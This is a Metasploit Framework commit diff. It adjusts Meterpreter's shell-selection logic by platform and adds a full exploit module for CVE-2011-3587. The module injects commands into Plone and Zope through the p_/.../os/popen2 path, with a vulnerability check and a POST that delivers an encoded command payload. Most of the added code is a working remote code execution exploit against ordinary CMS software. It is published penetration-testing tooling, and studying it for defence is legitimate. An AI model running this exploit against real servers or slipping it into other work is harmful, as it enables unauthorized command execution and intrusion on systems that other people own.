Merge branch 'master' of github.com:rapid7/metasploit-framework

lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb

@@ -153,12 +153,21 @@ class Console::CommandDispatcher::Stdapi::Sys
 	# Drop into a system shell as specified by %COMSPEC% or
 	# as appropriate for the host.
 	def cmd_shell(*args)
-		if client.platform =~/win/
+		case client.platform
+		when /win/
 			path = client.fs.file.expand_path("%COMSPEC%")
 			path = (path and not path.empty?) ? path : "cmd.exe"
 			cmd_execute("-f", path, "-c", "-H", "-i", "-t")
+		when /linux/
+			# Don't expand_path() this because it's literal anyway
+			path = "/bin/sh"
+			cmd_execute("-f", path, "-c", "-i")
 		else
-			path = client.fs.file.expand_path("/bin/bash")
+			# Then this is a multi-platform meterpreter (php or java), which
+			# must special-case COMSPEC to return the system-specific shell.
+			path = client.fs.file.expand_path("%COMSPEC%")
+			# If that failed for whatever reason, guess it's unix
+			path = (path and not path.empty?) ? path : "/bin/sh"
 			cmd_execute("-f", path, "-c", "-i")
 		end
 	end

modules/exploits/multi/http/plone_popen2.rb

@@ -0,0 +1,93 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info={})
+		super(update_info(info,
+			'Name'           => 'Plone and Zope Remote CMD Injection Exploit',
+			'Description'    => %q{
+				Unspecified vulnerability in Zope 2.12.x and 2.13.x, as used in Plone 4.0.x
+				through 4.0.9, 4.1, and 4.2 through 4.2a2, allows remote attackers to execute
+				arbitrary commands via vectors related to the p_ class in OFS/misc_.py and
+				the use of Python modules.
+
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'Plone Security team',  # Vulnerability discovery
+					'Nick Miles',           # Original exploit
+					'TecR0c'                # Metasploit module
+				],
+			'References'     =>
+				[
+					['CVE', '2011-3587'],
+					['URL', 'http://www.exploit-db.com/exploits/18262/'],
+					['URL', 'http://plone.org/products/plone/security/advisories/20110928']
+				],
+			'Privileged'     => false,
+			'Payload'        =>
+			{
+				'Compat'     =>
+				{
+					'PayloadType'  => 'cmd',
+					'RequiredCmd'  => 'generic telnet perl ruby',
+				}
+			},
+			'Platform'       => ['unix', 'linux'],
+			'Arch'           => ARCH_CMD,
+			'Targets'        => [['Automatic',{}]],
+			'DisclosureDate' => 'Oct 04 2011',
+			'DefaultTarget'  => 0
+		))
+
+		register_options(
+			[
+				Opt::RPORT(8080),
+				OptString.new('URI',[true, "The path to the Plone installation", "/"]),
+			],self.class)
+		register_autofilter_ports([ 8080 ])
+	end
+
+	def check
+		uri = datastore['URI']
+		uri << '/' if uri[-1,1] != '/'
+		uri << 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2'
+
+		res = send_request_raw(
+			{
+				'uri'       => uri
+			}, 25)
+		if (res.headers['Bobo-Exception-Type'] =~ /zExceptions.BadRequest/)
+			return Exploit::CheckCode::Vulnerable
+		end
+		# patched == zExceptions.NotFound
+		return Exploit::CheckCode::Safe
+	end
+
+	def exploit
+		uri = datastore['URI']
+		uri << '/' if uri[-1,1] != '/'
+		uri << 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2'
+
+		send_request_cgi(
+			{
+				'method'    => 'POST',
+				'uri'       => uri,
+				'vars_post' =>
+					{
+						'cmd' => payload.encoded,
+					}
+			}, 0.5) # short timeout, we don't care about the response
+	end
+end